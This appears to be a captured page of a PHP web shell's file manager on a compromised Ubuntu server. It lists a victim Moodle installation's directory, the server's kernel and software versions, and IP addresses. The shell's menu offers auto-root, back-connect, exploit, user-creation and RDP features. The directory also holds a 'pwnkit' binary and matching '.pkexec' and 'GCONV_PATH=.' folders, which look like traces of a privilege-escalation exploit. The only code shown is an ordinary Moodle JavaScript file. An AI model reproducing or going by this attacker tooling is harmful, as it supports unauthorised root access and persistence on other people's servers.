Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
calendar /
amd /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
calendar.js
9.02
KB
-rw-rw-r--
calendar_filter.js
3.39
KB
-rw-rw-r--
calendar_mini.js
3.94
KB
-rw-rw-r--
calendar_threemonth.js
4.57
KB
-rw-rw-r--
calendar_view.js
3.64
KB
-rw-rw-r--
crud.js
8.35
KB
-rw-rw-r--
drag_drop_data_store.js
5.43
KB
-rw-rw-r--
event_form.js
2.98
KB
-rw-rw-r--
events.js
1.59
KB
-rw-rw-r--
modal_delete.js
3.59
KB
-rw-rw-r--
modal_event_form.js
14.29
KB
-rw-rw-r--
month_navigation_drag_drop.js
7.33
KB
-rw-rw-r--
month_view_drag_drop.js
13.1
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
repository.js
6.49
KB
-rw-rw-r--
selectors.js
2.39
KB
-rw-rw-r--
summary_modal.js
6.9
KB
-rw-rw-r--
view_manager.js
16.74
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : selectors.js
// This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * This module is responsible for the calendar filter. * * @module core_calendar/calendar_selectors * @package core_calendar * @copyright 2017 Andrew Nicols <andrew@nicols.co.uk> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define([], function() { return { eventFilterItem: "[data-action='filter-event-type']", eventType: { site: "[data-eventtype-site]", category: "[data-eventtype-category]", course: "[data-eventtype-course]", group: "[data-eventtype-group]", user: "[data-eventtype-user]", }, popoverType: { site: "[data-popover-eventtype-site]", category: "[data-popover-eventtype-category]", course: "[data-popover-eventtype-course]", group: "[data-popover-eventtype-group]", user: "[data-popover-eventtype-user]", }, calendarPeriods: { month: "[data-period='month']", }, courseSelector: 'select[name="course"]', actions: { create: '[data-action="new-event-button"]', edit: '[data-action="edit"]', remove: '[data-action="delete"]', viewEvent: '[data-action="view-event"]', }, elements: { courseSelector: 'select[name="course"]', }, today: '.today', day: '[data-region="day"]', wrapper: '.calendarwrapper', eventItem: '[data-type="event"]', links: { navLink: '.calendarwrapper .arrow_link', eventLink: "[data-region='event-item']", }, containers: { loadingIcon: '[data-region="overlay-icon-container"]', }, }; });
Close